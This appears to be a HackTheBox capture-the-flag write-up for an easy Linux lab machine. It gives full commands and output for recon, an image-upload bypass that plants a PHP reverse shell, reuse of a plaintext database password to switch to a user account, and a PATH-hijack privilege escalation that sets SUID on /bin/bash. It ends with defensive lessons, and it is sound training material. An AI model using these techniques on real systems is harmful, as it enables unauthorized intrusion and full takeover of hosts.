[HTB] Machine Example Writeup

Platform: HackTheBox
Machine: Machine Example
OS: Linux
Difficulty: Easy
Points: 20
Release: 2026-01-15
IP Address: 10.10.10.100
linux web privesc

## Summary

Machine Example is an easy Linux box featuring a vulnerable web application with file upload functionality that allows us to get a shell. Privilege escalation is achieved through a misconfigured SUID binary.

## Reconnaissance

### Nmap Scan

Starting with a comprehensive nmap scan:

$ nmap -sCV -p- -oA nmap/machine-example 10.10.10.100

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Upload Portal
|_http-server-header: Apache/2.4.41 (Ubuntu)

We have SSH on port 22 and a web server on port 80.

### Web Enumeration

Visiting the website reveals an upload portal. Let's enumerate directories:

$ gobuster dir -u http://10.10.10.100 -w /usr/share/wordlists/dirb/common.txt

/uploads              (Status: 301)
/admin                (Status: 403)
/index.php            (Status: 200)

## Initial Foothold

### File Upload Bypass

The upload portal only accepts images. Let's try to bypass this restriction:

# Create a PHP reverse shell with image extension
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php.jpg

# Intercept the request with Burp and change:
# Content-Type: image/jpeg
# Filename: shell.php

After uploading, we can access our shell at /uploads/shell.php

### Getting a Shell

# Start listener
$ nc -lvnp 4444

# Trigger the shell
$ curl http://10.10.10.100/uploads/shell.php

# We get a connection!
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.100] 48234
$ whoami
www-data

### Shell Upgrade

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@machine:/var/www/html$ export TERM=xterm
www-data@machine:/var/www/html$ ^Z
$ stty raw -echo; fg

## User Flag

Looking around, we find credentials in the web application config:

www-data@machine:/var/www/html$ cat config.php
<?php
$db_user = "admin";
$db_pass = "SuperSecretPass123!";
?>

This password works for the user developer:

www-data@machine:/var/www/html$ su developer
Password: SuperSecretPass123!

developer@machine:~$ cat user.txt
HTB{f4k3_us3r_fl4g_h3r3}

## Privilege Escalation

### Enumeration

Let's check for SUID binaries:

developer@machine:~$ find / -perm -4000 2>/dev/null
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chsh
/opt/backup  <-- Interesting!

### Exploiting the SUID Binary

The /opt/backup binary has SUID permissions and calls tar without a full path:

developer@machine:~$ strings /opt/backup
...
tar -czf /backups/backup.tar.gz /var/www/html
...

We can exploit this via PATH hijacking:

# Create malicious tar
developer@machine:~$ echo '#!/bin/bash' > /tmp/tar
developer@machine:~$ echo 'chmod +s /bin/bash' >> /tmp/tar
developer@machine:~$ chmod +x /tmp/tar

# Modify PATH and run the binary
developer@machine:~$ export PATH=/tmp:$PATH
developer@machine:~$ /opt/backup

# Now bash has SUID
developer@machine:~$ /bin/bash -p
bash-5.0# whoami
root

## Root Flag

bash-5.0# cat /root/root.txt
HTB{f4k3_r00t_fl4g_h3r3}

## Lessons Learned

  • Always validate file uploads on the server-side
  • Never store credentials in plaintext configuration files
  • Use absolute paths in SUID binaries
  • Regularly audit file permissions
─────────────────────────────────────
HackTheBox // Machine Example
ribeir.in
─────────────────────────────────────
<< Back to HackTheBox